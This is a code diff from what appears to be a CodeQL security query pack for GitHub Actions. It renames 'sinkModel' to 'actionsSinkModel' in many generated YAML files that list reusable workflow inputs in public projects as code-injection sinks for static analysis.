@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/mute-stream/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml index 5ec8c0969346..53e16f8771a4 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-semver.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-semver/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml index af9582282d0d..4310e028de16 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_node-which.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/node-which/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml index 61bbb9d53728..84d2f57a3fbc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_nopt.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/nopt/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml index fdb440a742ff..7debf6960edc 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_normalize-package-data.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/normalize-package-data/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml index efd05d69abe4..640180b870af 100644 --- a/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/npm_write-file-atomic.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["npm/write-file-atomic/.github/workflows/release-integration.yml", "*", "input.releases", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml index 9be191425ffd..7ea3039b552b 100644 --- a/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/onflow_cadence.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.base-branch", "code-injection", "generated"] - ["onflow/cadence/.github/workflows/compatibility-check-template.yml", "*", "input.repo", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml index 65a14c7cfaa1..ced66aee32f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-goal_jak-project.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-goal/jak-project/.github/workflows/windows-build-msvc.yaml", "*", "input.cmakePreset", "code-injection", "generated"] - ["open-goal/jak-project/.github/workflows/windows-build-clang.yaml", "*", "input.cmakePreset", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml index 2c031ea9dc62..e63440d1fcae 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-demo.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-demo/.github/workflows/build-images.yml", "*", "input.push", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml index b90aacee9ca1..f7021148c514 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet-contrib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.Package.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet-contrib/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml index 56823f4e1acc..8345368057c7 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-dotnet.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-name", "code-injection", "generated"] - ["open-telemetry/opentelemetry-dotnet/.github/workflows/Component.BuildTest.yml", "*", "input.project-build-commands", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml index 0f2937f9d148..3754ebfa63d1 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-java-instrumentation.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-workflow-notification.yml", "*", "input.success", "code-injection", "generated"] - ["open-telemetry/opentelemetry-java-instrumentation/.github/workflows/reusable-smoke-test-images.yml", "*", "input.project", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml index a88c74f85375..3e35747b558a 100644 --- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-js-contrib.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-js-contrib/.github/workflows/test-all-versions.yml", "*", "input.npm-workspace-args", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml index b7dfd8fcc9b1..a13f6863caa5 100644 
--- a/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/open-telemetry_opentelemetry-operator.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-publish-autoinstrumentation-e2e-images.yaml", "*", "input.language", "code-injection", "generated"] - ["open-telemetry/opentelemetry-operator/.github/workflows/reusable-operator-hub-release.yaml", "*", "input.org", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml index 9de8130a93e6..af5c300ea8bd 100644 --- a/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openbao_openbao.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.path", "code-injection", "generated"] - ["openbao/openbao/.github/workflows/test-run-acc-tests-for-path.yml", "*", "input.name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml index ea4980b8cd7a..449ea8b7b490 100644 --- a/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openhab_openhab-docs.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.doc_base_name", "code-injection", "generated"] - ["openhab/openhab-docs/.github/workflows/fetch_external_docs_reusable.yml", "*", "input.base_file", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml index 8787c7e32c9a..6656d42c4e69 100644 --- a/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openmined_pysyft.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.release_platform", "code-injection", "generated"] - ["openmined/pysyft/.github/workflows/cd-post-release-tests.yml", "*", "input.syft_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml index ea55d53c215f..6e7fdc34a54b 100644 --- a/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/opentofu_opentofu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.package-name", "code-injection", "generated"] - ["opentofu/opentofu/.github/workflows/build-opentofu-oss.yml", "*", "input.product-version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml index add2fe0d2e2e..8fc02a27e1cd 100644 --- a/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openttd_openttd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openttd/openttd/.github/workflows/release-windows.yml", "*", "input.survey_key", "code-injection", "generated"] - ["openttd/openttd/.github/workflows/upload-steam.yml", "*", "input.trigger_type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml index 400cd50b59f9..80f19676b4a7 100644 --- a/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openvinotoolkit_openvino.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openvinotoolkit/openvino/.github/workflows/job_tensorflow_models_tests.yml", "*", "input.model_scope", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml index 42122b5ee22a..56b2ef6691e4 100644 --- a/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openxla_iree.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_vulkan.yml", "*", "input.artifact_run_id", "code-injection", "generated"] - ["openxla/iree/.github/workflows/pkgci_regression_test_nvidiagpu_cuda.yml", "*", "input.artifact_run_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml index c694d3953f63..7bc952a84834 100644 --- a/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/openzfs_zfs.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["openzfs/zfs/.github/workflows/zfs-linux-tests.yml", "*", "input.os", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml index 9ecf401cab50..1c0663dd01c6 100644 --- a/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/operator-framework_java-operator-sdk.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.http-client", "code-injection", "generated"] - ["operator-framework/java-operator-sdk/.github/workflows/integration-tests.yml", "*", "input.kube-version", "code-injection", "generated"] 
diff --git a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml index 19fee627702a..4da8f3276622 100644 --- a/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/orange-opensource_hurl.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["orange-opensource/hurl/.github/workflows/update-branch-version.yml", "*", "input.new_version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml index 4eb201001e14..4e8adfafe3c2 100644 --- a/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/paolosalvatori_servicebusexplorer.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["paolosalvatori/servicebusexplorer/.github/workflows/publish.yml", "*", "input.release-version", "code-injection", "generated"] - ["paolosalvatori/servicebusexplorer/.github/workflows/build-test.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml index 94c7292b655e..28cb702ce13c 100644 --- a/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/parcel-bundler_parcel.model.yml 
@@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["parcel-bundler/parcel/.github/workflows/release.yml", "*", "input.release-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml index 6088ffcd7023..cb315ee4328c 100644 --- a/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pardeike_harmony.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pardeike/harmony/.github/workflows/test-build.yml", "*", "input.build_configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml index 05c4dc8ddf37..956c4cba9669 100644 --- a/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pcsx2_pcsx2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.configuration", "code-injection", "generated"] - ["pcsx2/pcsx2/.github/workflows/windows_build_qt.yml", "*", "input.platform", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml index affc12cdc4ad..804c1bdae4e2 100644 --- a/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pennylaneai_pennylane.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.pytest_test_directory", "code-injection", "generated"] - ["pennylaneai/pennylane/.github/workflows/unit-test.yml", "*", "input.job_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml index b1c4d2f2cbfd..78d91b2afb5f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pinecone-io_pinecone-python-client.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pinecone-io/pinecone-python-client/.github/workflows/publish-to-pypi.yaml", "*", "input.prereleaseSuffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml index 4ccbd71f8c36..31cadc3ff179 100644 --- a/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pixie-io_pixie.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.tags", "code-injection", "generated"] - ["pixie-io/pixie/.github/workflows/perf_common.yaml", "*", "input.suites", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml index 2eb2104b542a..11362fda1e55 100644 
--- a/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/plantuml_plantuml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["plantuml/plantuml/.github/workflows/native-image.yml", "*", "input.release-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml index fee958600308..131cff3e92a8 100644 --- a/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/powerdns_pdns.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.os", "code-injection", "generated"] - ["powerdns/pdns/.github/workflows/build-packages.yml", "*", "input.product", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml index 49a98d4dda55..acc5bf51e357 100644 --- a/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/preactjs_preact.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.benchmark", "code-injection", "generated"] - ["preactjs/preact/.github/workflows/run-bench.yml", "*", "input.trace", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml index aa432107a0d1..c89d1c808c30 100644 --- a/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prismlauncher_prismlauncher.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prismlauncher/prismlauncher/.github/workflows/build.yml", "*", "input.build_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml index 40053c68c1a2..0258c79e83f6 100644 --- a/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/product-os_flowzone.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["product-os/flowzone/.github/workflows/flowzone.yml", "*", "input.ok_to_test_label", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml index 645ec756783f..ebeba1eb2268 100644 --- a/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/project-oak_oak.model.yml 
@@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.ent-public-key", "code-injection", "generated"] - ["project-oak/oak/.github/workflows/reusable_provenance.yaml", "*", "input.build-config-path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml index 3d80594c0d5e..5f709385839a 100644 --- a/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/prql_prql.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["prql/prql/.github/workflows/test-rust.yaml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml index e542d409efe8..e96dbba0699d 100644 --- a/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pulumi_pulumi.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-command", "code-injection", "generated"] - ["pulumi/pulumi/.github/workflows/ci-run-test.yml", "*", "input.test-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml index 9cc02d3b38c7..2a7a9afd5a68 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/puppeteer_puppeteer.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["puppeteer/puppeteer/.github/workflows/changed-packages.yml", "*", "output.changes", "filename", "manual"] diff --git a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml index 5ebf7426d167..5094422f3fed 100644 --- a/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/puppetlabs_puppetlabs-puppetdb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_spec.yml", "*", "input.ignore_dependency_check", "code-injection", "generated"] - ["puppetlabs/puppetlabs-puppetdb/.github/workflows/module_acceptance.yml", "*", "input.debug", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml index c5630248f7f9..dff837456454 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pyo3_maturin.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/maturin/.github/workflows/downstream.yml", "*", "input.manifest-dir", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml index 4ea93f374b3c..88b68dc4ea7f 100644 --- a/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml 
+++ b/ql/lib/ext/generated/reusable-workflows/pyo3_pyo3.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pyo3/pyo3/.github/workflows/build.yml", "*", "input.extra-features", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml index d702e7ad830a..18c6974c74f4 100644 --- a/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/python_cpython.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["python/cpython/.github/workflows/reusable-ubuntu.yml", "*", "input.options", "code-injection", "generated"] - ["python/cpython/.github/workflows/reusable-tsan.yml", "*", "input.options", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml index baba2fc1e150..561c3e15e641 100644 --- a/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/pytorch_botorch.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["pytorch/botorch/.github/workflows/reusable_website.yml", "*", "input.release_tag", "code-injection", "generated"] \ No newline at end of file diff --git 